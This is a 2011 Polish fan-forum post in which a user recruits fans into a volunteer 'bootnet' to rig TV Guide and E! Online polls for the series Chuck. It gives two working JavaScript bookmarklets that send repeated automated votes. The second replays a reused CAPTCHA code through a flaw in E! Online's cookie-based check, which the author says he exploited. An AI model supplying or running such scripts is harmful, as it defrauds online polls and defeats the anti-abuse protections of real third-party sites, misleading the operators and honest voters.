Głosowania na E! i TV Guide

Stare, zakurzone i zapomniane tematy z tytułowego działu.

Głosowania na E! i TV Guide

Postautor: Lukasz032 » 6 maja 2011, o 22:59

Witajcie ponownie, drodzy użytkownicy! Jak pewnie większość zdążyła zauważyć, rozpoczęły się kolejne głosowania - na stronach E! i TV Guide.

W TV Guide coś kiepsko nam idzie, nie możemy przebić jednego serialu :D. Mam na to lekarstwo i tak, jak poprzednio, jest to wolontaryjny bootnet. Jedyna rzecz, którą musi zrobić zainteresowany użytkownik, aby się do niego przyłączyć, to otworzyć zakładkę z głosowaniem i wkleić do paska adresu i potwierdzić (albo jeszcze lepiej - zamieścić w skryptozakładce i ją uruchomić) poniższy kod:
Kod: Zaznacz cały
javascript:var votediv=document.createElement("div");votediv.setAttribute("id","voteresults");votediv.setAttribute("style","border: 2px solid red; color: red; position: absolute; left: 22px; top: 22px; z-index: 120");votediv.innerHTML="O";document.body.appendChild(votediv);window.votesDisposed=0;function generate_vote() {var request=new XMLHttpRequest();request.open("GET","http://www.tvguide.com/Script/ajax_callbacks/poll_vote.ashx?pollid=1032237&answerid=3",false);request.send(null);if(request.status==200){window.votesDisposed+=1;}if(window.votesDisposed>=100){window.votesDisposed=0;document.getElementById("voteresults").innerHTML+=">";}return request.status;}window.setInterval("generate_vote();",500);void(0)


Zasada działania taka sama, jak przy głosowaniu na Hulu. Czerwony prostokąt z kółkiem oznacza pracę klienta bootneta, strzałki - każde wysłane 100 głosów. Tempo głosowania - 2 głosy / sekundę z jednego komputera. Bootnet wolny od jakichkolwiek wirusów.


----

EDIT: Uruchomiłem też drugi bootnet, tym tazem do głosowania na E! Online. Było to możliwe przez dość ciekawy, oparty na ciasteczkach mechanizm sprawdzania kodu potwierdzającego. Jeden kod może zostać wykorzystany wielokrotnie i właśnie tą słabość wykorzystałem.

Sposób uruchomienia:

Należy wejść na stronę głosowania na E! Online, oddać ręcznie JEDEN głos (tylko nie klawiszem Enter w polu kodu, tylko ręcznie kliknąć na Vote) i NIE ODŚWIEŻAĆ strony, tylko wpisać poniższy kod w pasek adresu i potwierdzić:
Kod: Zaznacz cały
javascript:var votediv=document.createElement("div");votediv.setAttribute("id","voteresults");votediv.setAttribute("style","border: 2px solid red; color: red; position: absolute; left: 22px; top: 22px");votediv.innerHTML="O";document.body.appendChild(votediv);window.votesDisposed=0;function generate_vote() {var captchacode = hex_md5(document.getElementById('poll_uword').value);var request=new XMLHttpRequest();request.open("GET","http://uk.eonline.com/services/processPoll.jsp?poll_id=9746&choice_selected=81157&captchaEntry="+captchacode+"&supp_id=",false);request.send(null);if(request.status==200){window.votesDisposed+=1;}if(window.votesDisposed>=100){window.votesDisposed=0;document.getElementById("voteresults").innerHTML+=">";}return request.status;}window.setInterval("generate_vote();",500);void(0)


Mechanika się nie zmieniła, sygnalizacja działania pozostaje ta sama. Kod w 100 % bezpieczny.
Awatar użytkownika
Lukasz032
Kierownik sklepu
 
Posty: 140
Rejestracja: 18 lis 2010, o 23:29
Lokalizacja: Rzeszów
Online: 4d 14h 5m 50s
Otrzymał podziękowań: 42 razy
Płeć: Fan
Ulubiona postać: Stephen Bartowski
Obecnie oglądam: Chuck S05, Ojciec Mateusz S05
    Windows 7 Chrome

Wróć do Newsy

Aktualnie szpiegują

Użytkownicy przeglądający to forum: Nie ma żadnego zarejestrowanego użytkownika i 5 gości


Powered by phpBB® Forum Software © phpBB Group
ChuckTV.pl © 2010-2012 DuDeStudio.pl
cron